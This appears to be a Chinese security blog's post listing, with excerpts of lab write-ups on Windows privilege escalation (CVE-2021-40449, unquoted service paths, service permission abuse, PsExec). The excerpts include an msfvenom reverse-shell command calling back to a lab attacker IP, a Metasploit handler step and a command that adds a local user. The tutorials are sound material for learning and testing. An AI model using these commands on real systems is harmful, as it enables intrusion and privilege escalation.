zhyann的头像-白鸢的笔记
管理员
这家伙很懒,什么都没有写...
CVE-2021-40449-白鸢的笔记

CVE-2021-40449

实验实验环境Windows10 受害者 192.168.192.147  使用wesng发现有CVE-2021-40449漏洞Kali 攻击者 192.168.192.128python wes.py systeminfo.txt -o win10.csv cat win10.csv | grep 'CVE-2021-...
Windows服务漏洞利用-不带引号的服务路径-白鸢的笔记

Windows服务漏洞利用-不带引号的服务路径

假设管理员将服务保存在如下路径下:C:\Proqram Files\Unquoted Path Service\Common Files\unquotedpathservice.exe程序执行路径中有空格由于空格字符,操作系统将把前面的路径视为五个不同的...
Windows服务漏洞利用-覆盖服务的可执行程序-白鸢的笔记

Windows服务漏洞利用-覆盖服务的可执行程序

在“Windows服务漏洞利用-利用错误的服务权限进行提权”一章中在我们拥有更改服务配置的权限假设我们没有这些权限(SERVICE_CHANGE_CONFIG)但是我们拥有更改服务可执行文件的权限。换句话说我...
Windows服务漏洞利用-利用错误的服务权限进行提权-白鸢的笔记

Windows服务漏洞利用-利用错误的服务权限进行提权

我们想要一个我们(有限的用户)的权限更改其配置的服务。如果这个服务是使用高权限账户运行时 我们可以修改此服务的执行路径改成我们反向shell的路径 shell返回高权限用户的shell从而提权。 我...
Windows服务管理 sc-白鸢的笔记

Windows服务管理 sc

Windows系统中的服务就像Linux系统中的守护进程。它们在后台运行任务,大多数情况下,它们使用SYSTEM特权执行(为我们提供了另一种实现系统shell的方法)。 1.对服务的管理scsc qc [service na...
PSExec           -白鸢的笔记

PSExec           

https://learn.microsoft.com/zh-cn/sysinternals/downloads/psexecPSExec 命令行工具类似于 runas,这个工具与 runas.exe 之间的区别在于PSExec有更多的选项和灵活性被称为命令行下的远程桌面...
Running as in Windows-白鸢的笔记

Running as in Windows

如果您以低权限用户的身份运行,并且拥有管理员凭证(用户名和密码),那么您可以使用这些凭证升级您的权限。最实际的方法是首先复制反向shell(例如,netcat或使用MSFvenom生成的shell)。之后...
实验-白鸢的笔记

实验

1. 获取一个Meterpreter shellmsfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.192.128 LPORT=3333 -f exe -o reverse.exe 2. 在Kali使用handler模块建立监听use exploit/multi/hand...
Windows漏洞利用权限提升-白鸢的笔记

Windows漏洞利用权限提升

1.内核漏洞利用的流程获取OS的版本信息查找匹配的漏洞把漏洞利用程序(POC)传输到一个可写的目录运行,得到管理员shell 2. 实验2.1 获取OS的版本信息 2.2 查找匹配的漏洞https://github.com/bi...
Windows本机信息收集-白鸢的笔记

Windows本机信息收集

1. Windows系统基本命令1.1 系统信息收集显示系统的详细信息systeminfo1.2 用户信息whoami /user查看管理员组net localgroup administrators1.3 添加用户net user kali 123456 /add1.4 查看所有...